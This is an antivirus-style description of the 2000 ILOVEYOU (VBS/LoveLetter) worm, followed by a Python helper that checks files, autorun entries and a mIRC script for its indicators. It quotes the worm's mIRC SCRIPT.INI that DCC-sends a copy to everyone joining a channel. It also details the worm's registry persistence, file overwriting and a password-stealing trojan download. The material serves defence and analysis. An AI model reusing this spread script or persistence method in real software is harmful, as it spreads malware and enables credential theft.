Virus Name:      VBS/LoveLetter.worm
Aliases:         none known
Date Discovered: Thursday May 4th 2000
DAT included:    4077
Risk:            High

Characteristics:

This worm is a VBS program that is sent attached to an email with the
subject ILOVEYOU.
The mail contains the message "kindly check the attached LOVELETTER coming
from me."
The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs
If the user runs the attachment the worm runs using the Windows Scripting
Host program. This is not normally present on Windows 95 or Windows NT
unless Internet Explorer 5 is installed.

When the worm is first run it drops copies of itself in the following
places :-

C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
C:\WINDOWS\WIN32DLL.VBS
C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

It also adds the registry keys :-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=C:\WINDOWS\Win32DLL.vbs
in order to run the worm at system start-up.

The worm replaces the following files :-
*.JPG
*.JPEG
*.MP3
*.MP2
with copies of itself and it adds the extension .VBS to the original
filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would
contain the worm.

The worm also overwrites the following files :-
*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA
with copies of itself and renames the files to *.VBS.

The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and
this is then sent to the IRC channels if the mIRC client is installed. This
is accomplished by the worm replacing the file SCRIPT.INI with the following
script :-

[script]
n0=on 1:JOIN:#:{
n1=  /if ( $nick == $me ) { halt }
n2=  /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
n3=}

After a short delay the worm uses Microsoft Outlook to send copies of itself
to all entries in the address book.
The mails will be of the same format as the original mail.

This worm also has another trick up its sleeve in that it tries to download
and install an executable file called WIN-BUGSFIX.EXE from the Internet.
This exe file is a password stealing program that will email any cached
passwords to the mail address [log in to unmask]

In order to facilitate this download the worm sets the start-up page of
Microsoft Internet Explorer to point to the web-page containing the password
stealing trojan.

The email sent by this program is as follows :-
From: [log in to unmask]
[log in to unmask]
Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
Host: goat1
Username: Goat1
IP Address: 192.168.0.2
RAS Passwords:...
<password information goes here>
...
Cache Passwords:...
<password information goes here>
...
goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:
MAPI                           : MAPI

The password stealing trojan is also installed via the following registry
key :-
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
to auto run at system start-up.

After it has been run the password stealing trojan copies itself to
WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=WinFAT32.EXE
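As an added illustration, not part of the original description, the following Python triage helper checks a list of file paths, Run/RunServices values and a SCRIPT.INI for the indicators named above (dropped worm copies, the NAME.JPG.VBS double-extension pattern, the autorun value names and the mIRC DCC script). The function names and the sample inputs are constructed for this example.

```python
import re
from pathlib import PureWindowsPath

# Indicators taken from the description above (file names, autorun value
# names, replaced media extensions and the mIRC DCC line).
WORM_FILENAMES = {"MSKERNEL32.VBS", "WIN32DLL.VBS",
                  "LOVE-LETTER-FOR-YOU.TXT.VBS", "LOVE-LETTER-FOR-YOU.HTM"}
AUTORUN_NAMES = {"MSKERNEL32", "WIN32DLL", "WIN-BUGSFIX", "WINFAT32"}
REPLACED_MEDIA = {".JPG", ".JPEG", ".MP3", ".MP2"}   # become NAME.JPG.VBS etc.
MIRC_DCC = re.compile(r"dcc\s+send\s+\$nick\s+.*LOVE-LETTER-FOR-YOU\.HTM", re.I)

def check_path(path):
    # A dropped copy by name, or a media file the worm replaced (double extension).
    p = PureWindowsPath(path)
    if p.name.upper() in WORM_FILENAMES:
        return (path, "dropped worm copy")
    suffixes = [s.upper() for s in p.suffixes]
    if len(suffixes) >= 2 and suffixes[-1] == ".VBS" and suffixes[-2] in REPLACED_MEDIA:
        return (path, "media file replaced by worm copy")
    return None

def check_autorun(value_name, data):
    # Run/RunServices values the worm or the WIN-BUGSFIX trojan add.
    if value_name.upper() in AUTORUN_NAMES:
        return (value_name, "worm/trojan autorun entry")
    if PureWindowsPath(data).name.upper() in WORM_FILENAMES:
        return (value_name, "autorun points at worm copy")
    return None

def check_mirc_script(script_ini_text):
    # The SCRIPT.INI that DCC-sends the .HTM copy to everyone joining a channel.
    if MIRC_DCC.search(script_ini_text):
        return ("SCRIPT.INI", "mIRC DCC spread script")
    return None

def triage(paths, autoruns, script_ini_text):
    findings = [f for f in map(check_path, paths) if f]
    findings += [f for f in (check_autorun(n, d) for n, d in autoruns) if f]
    hit = check_mirc_script(script_ini_text)
    return findings + ([hit] if hit else [])

# Constructed sample inputs (not real captures) exercising each check.
SAMPLE_PATHS = [r"C:\WINDOWS\SYSTEM\MSKernel32.vbs", r"C:\My Documents\PICT.JPG.VBS",
                r"C:\My Documents\holiday.jpg", r"C:\WINDOWS\notepad.exe"]
SAMPLE_AUTORUNS = [("MSKernel32", r"C:\WINDOWS\SYSTEM\MSKernel32.vbs"),
                   ("WinFAT32", "WinFAT32.EXE"), ("SystemTray", "SysTray.Exe")]
SAMPLE_SCRIPT_INI = ("[script]\nn0=on 1:JOIN:#:{\nn1=  /if ( $nick == $me ) { halt }\n"
                     "n2=  /.dcc send $nick C:\\WINDOWS\\SYSTEM\\LOVE-LETTER-FOR-YOU.HTM\nn3=}\n")

if __name__ == "__main__":
    for item, reason in triage(SAMPLE_PATHS, SAMPLE_AUTORUNS, SAMPLE_SCRIPT_INI):
        print(f"{reason}: {item}")
```

On a live system the path list would come from a directory walk and the autorun pairs from the Run and RunServices keys; the checks themselves are unchanged.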